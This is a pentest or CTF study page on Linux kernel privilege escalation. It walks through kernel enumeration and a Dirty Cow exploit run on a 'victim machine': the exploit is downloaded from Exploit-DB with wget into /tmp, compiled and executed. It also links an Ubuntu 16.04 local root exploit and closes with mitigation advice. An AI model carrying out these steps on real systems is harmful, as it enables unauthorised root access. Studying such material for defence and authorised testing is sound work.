# Kernel Exploits

## Enumeration

Enumerate kernel version and google it:

```bash
uname -a
```

Or, transfer `linux-exploit-suggester.sh` to the victim machine and run it. If the keyword "dirtycow" is in the output, try it.

## Dirty Cow

{% embed url="<https://dirtycow.ninja/>" %}
Dirty Cow
{% endembed %}

Dirty Cow is the most commonly used kernel exploit in CTF-like. The downside is that a failed Dirty Cow attack may crash the victim machine. This will be really bad in a real-world pentest scenario.

{% hint style="info" %}
Quote from the original bug report:

A **race condition** was found in the way the Linux kernel's memory subsystem handled the **copy-on-write (COW)** breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
{% endhint %}

Suppose we want to use exploit 40616 from Exploit-DB. On the victim machine, change to the `/tmp` directory:

```bash
cd /tmp
```

download it:

```bash
wget https://www.exploit-db.com/download/40616 -O cowroot.c
```

Following the instruction, uncomment a payload, and compile it:

```bash
gcc cowroot.c -o cowroot -pthread
```

Execute the exploit:

```bash
./cowroot
```

Make the shell more stable:

```bash
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
```

## Cheat Code: Ubuntu 16.04 Privesc

{% hint style="info" %}
Many Linux machines are vulnerable to this kernel exploit, so I call it the "cheat code" in Linux privilege escalation.
{% endhint %}

This kernel exploit works smoothly for many boxes:

{% embed url="<https://www.exploit-db.com/exploits/44298>" %}
Ubuntu 16.04 local privesc
{% endembed %}

## Mitigation

A successful privilege escalation through kernel exploits require the following 5 conditions:

1. A vulnerable kernel
2. A working exploit
3. A way to transfer the exploit to the target
4. A way to compile the exploit (optional since some exploits can be compiled on the attack machine)
5. A way to execute the exploit

Condition 1 and 2 are hard to prevent, hence we should focus on condition 3, 4, and 5. The mitigation ideas are:

* **Prevent transferring the exploit**
  * Do not allow users to use FTP, TFTP, SMB, SCP, wget, and curl
* **Remove compilation tools**
  * Remove GCC, CC, and other development tools.
* **Prevent exploit execution**
  * Mount directories such as `/tmp` and `/home` on a separete non-executable file system.
  * For existing executables, set `chmod 700 <executable>` if you don't want the user to execute it.